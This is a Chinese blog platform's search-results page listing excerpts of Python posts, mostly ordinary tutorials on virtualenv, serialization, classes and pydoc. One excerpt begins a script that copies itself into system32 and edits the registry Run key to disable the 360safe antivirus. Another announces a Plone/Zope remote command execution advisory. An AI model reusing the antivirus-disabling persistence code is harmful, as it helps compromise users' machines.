按类别查询搜索结果
关于关键词 的检测结果,共 25
iibull | 2023-09-21 16:53:49 | 阅读(1120) | 评论(0)
点击(此处)折叠或打开https://www.cnblogs.com/zhang-zi-yi/p/9579909.htmlpip install virtualenvvirtualenv的基本使用1.1 创建虚拟环境virtualenv venv为环境指定Python解释器:...【阅读全文】
【其他平台】 python 调用 DLL
iibull | 2022-11-03 17:21:26 | 阅读(0) | 评论(0)
点击(此处)折叠或打开https://www.php.cn/python-tutorials-422498.html -----------------------------------------------Python 注释# 注释内容'''使用 3 个单引号分别作为注释的开头和结尾...【阅读全文】
iibull | 2022-08-10 15:06:54 | 阅读(0) | 评论(0)
点击(此处)折叠或打开切换版本     sudo update-alternatives --install /usr/bin/python python /usr/bin/python2.7 1    sudo update-alternatives --install /usr/bin/python python /usr/bin/python3.6 2...【阅读全文】
iibull | 2022-07-11 15:42:58 | 阅读(0) | 评论(0)
在windows 或者 ubuntu 中. 1. (img, center, radius, color[, thickness[, lineType[, shift]]])  【阅读全文】
bwf0702 | 2018-02-24 10:38:30 | 阅读(610) | 评论(0)
在python项目中常会发现作为数据容器的某个对象每次都需要被载入到内存,然后在程序运行之后,该对象还需要被保存下来供下次使用。将对象的状态信息转换为序列字符存储的过程就是对象序列化,反之将对象的序列信息恢复成内存对象,就是反序列化过程。python 序列化示例打开data.p文件,我们可以看到以下的字典对象...【阅读全文】
bwf0702 | 2018-02-22 11:28:51 | 阅读(370) | 评论(0)
区块链实现原理的简易描述区块链的简易实现代码以下是代码的运行结果,在不同的时间下,运行结果不同。【阅读全文】
bwf0702 | 2018-01-23 09:27:32 | 阅读(580) | 评论(0)
python 语言对于时间的处理继承了 C语言的传统,时间值是以秒为单位的浮点数,记录的是从1970年1月1日零点到现在的秒数,这个秒数可以转换成我们日常可阅读形式的日期和时间:我们下面首先来看一下python 中当前时间值的获取:1. 时间值获取示例运行结果显示:2. 时间的结构信息转换运行结果显示:上面的代...【阅读全文】
alienzf | 2017-05-22 00:20:53 | 阅读(7312) | 评论(0)
刚开始学习Python的类写法的时候觉得很是麻烦,为什么定义时需要而调用时又不需要,为什么不能内部简化从而减少我们敲击键盘的次数?你看完这篇文章后就会明白所有的疑问。self代表类的实例,而非类。实例来说明class Test: def prt(self): print(self) print(self.__class__)t = Test()t.prt()...【阅读全文】
alienzf | 2017-05-22 00:10:36 | 阅读(1200) | 评论(0)
刚开始学习Python的类写法的时候觉得很是麻烦,为什么定义时需要而调用时又不需要,为什么不能内部简化从而减少我们敲击键盘的次数?你看完这篇文章后就会明白所有的疑问。self代表类的实例,而非类。实例来说明class Test: def prt(self): print(self) print(self.__class__)t = Test()t.prt()...【阅读全文】
hbsxjs2014 | 2016-12-12 21:42:35 | 阅读(1550) | 评论(0)
Python用得最多的还是各类爬虫脚本:写过抓代理本机验证的脚本,写过在discuz论坛中自动登录自动发贴的脚本,写过自动收邮件的脚本,写过简单的验证码识别的脚本,本来想写google music的抓取脚本的,结果有了强大的gmbox,也就不用写了。这些脚本有一个共性,都是和web相关的,总要用到获取链接的一些方法,再加上simpl...【阅读全文】
spanthrive | 2016-07-07 16:55:39 | 阅读(0) | 评论(0)
Mac 下同时安装mysql-python 和 RF 后,出现冲突问题如下:Mac下mysql community server为64bit,mysql-python对应使用64bit python,而wxPython需要使用32bit,导致同时只能使用一个。不知是否我安装的mysql问题(没有找到mac os x 32bit的mysql 安装包,而mysql-python需要先安装mysql)解决方案:1. ...【阅读全文】
【其他平台】 python 如何使用帮助
bnt38 | 2016-04-14 10:01:36 | 阅读(0) | 评论(0)
首先打开命令行,在doc窗口输入:  python -m pydoc -p 4567  简单解释一下:  python -m pydoc表示打开pydoc模块,pydoc是查看python文档的首选工具;  -p 4567表示在4567端口上启动server;  然后在浏览器中访问http://localhost:4567/,此时应该可以看到python中所有的Modules按ctrl+f,输入selenium,...【阅读全文】
shimilaami4 | 2014-12-06 21:07:51 | 阅读(580) | 评论(0)
September 24, 2013 | By Kevin Poux Nike Air Python - White / Metallic Silver (8) Nike Air Python - White / Metallic Silver (7) Nike Air Python - White / Metallic Silver (6) Nike Air Python - White / Metallic Silver (5) Nike Air Python - White / Metallic Silver (4) ...【阅读全文】
【其他平台】 python-impacket.ImpactPacket
hzc191025 | 2014-11-03 18:21:13 | 阅读(0) | 评论(0)
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impackethttps://pypi.python.org/pypi/packet/http://stackoverflow.com/questions/12162563/how-to-combine-decoded-packet-data-and-header-output-into-a-single-variable-dicthttp://nullege.com/codes/search/impacket.Impact...【阅读全文】
cdbp31918757 | 2014-06-06 16:45:07 | 阅读(910) | 评论(0)
Plone zope远程命令履行破绽(python) Versions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone 4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x. Versions Not Affected: Versions of Plone that use Zope other than Zope 2.12.x and Zope 2.13.x. Advisory/Hotfix: plone.org/products/p...【阅读全文】
mzmk04951336 | 2014-06-06 15:55:11 | 阅读(390) | 评论(0)
用python修正注册表干掉360safe 文章作者:吴杰信息起源:邪恶八进制信息保险团队www.eviloctal.import _winregimport osimport shutil #复制自身shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe') #把360启动改为本身run _winreg.OpenKey( _winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows...【阅读全文】
南风有翼 | 2014-04-01 16:33:14 | 阅读(1160) | 评论(0)
Python的面向对象思想搜索树的简要分析【阅读全文】
g2xianxian | 2014-04-01 15:08:50 | 阅读(420) | 评论(0)
Python的面向对象思想搜索树的简要分析【阅读全文】
niao5929 | 2014-03-31 10:36:44 | 阅读(1430) | 评论(0)
Python的面向对象思想搜索树的简要分析【阅读全文】
qxhgd | 2014-03-31 09:22:52 | 阅读(970) | 评论(0)
Python的面向对象思想搜索树的简要分析【阅读全文】